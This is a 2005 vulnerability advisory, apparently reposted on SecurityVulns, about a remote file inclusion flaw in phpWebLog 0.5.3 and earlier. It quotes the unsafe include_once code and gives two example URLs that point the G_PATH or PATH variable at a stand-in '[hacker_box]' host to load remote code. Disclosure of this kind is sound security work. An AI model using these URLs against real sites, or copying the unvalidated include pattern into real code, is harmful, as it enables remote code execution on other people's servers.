SecurityvulnsSECURITYVULNS:DOC:8009phpWebLog <= 0.5.3 arbitrary file inclusion (VXSfx)
– == – == – == – == – == – == – == – == – == –
Name: phpWebLog
Version: <= 0.5.3
Homepage: http://phpweblog.org/
Author: Filip Groszynski (VXSfx)
Date: 7 March 2005
– == – == – == – == – == – == – == – == – == –
Vulnerable code in include/init.inc.php:
…
Allowed HTML tags in stories, comma seperated
$G_HTML = "<a>,<i>,<b>,<u>,<li>,<p>,<code>,<tt>,<blockquote>";
Are we developing?
$G_DEBUG = false;
Number of seconds to hold cache
$G_CACHE = 10;
phpWebLog version
$G_VER = "0.5.3";
…
/== include libraries/functions =========================================/
include_once("$G_PATH/include/func.inc.php");
include_once("$G_PATH/include/cache.inc.php");
include_once("$G_PATH/include/blocks.inc.php");
include_once("$G_PATH/include/layout.inc.php");
include_once("$G_PATH/include/parser.inc.php");
include_once("$G_PATH/include/search.inc.php");
include_once("$G_PATH/include/comments.inc.php");
…
Vulnerable code in backend/addons/links/index.php:
Original links code written by Twyst (http://anime-central.net)
Modified for use with phpWebLog by Jason Hines
Thanks Twyst!
include_once($PATH . "/functions.php");
…
Example:
if register_globals=on and allow_url_fopen=on:
http://[victim]/[dir]/include/init.inc.php?G_PATH=http://[hacker_box]/
http://[victim]/[dir]/backend/addons/links/index.php?PATH=http://[hacker_box]/
Vendor status:
Vendor has been notified.
Contact:
Author: Filip Groszynski (VXSfx)
Location: Poland <Warsaw>
Email: groszynskif <at> gmail <dot> com
HP: http://shell.homeunix.org
– == – == – == – == – == – == – == – == – == –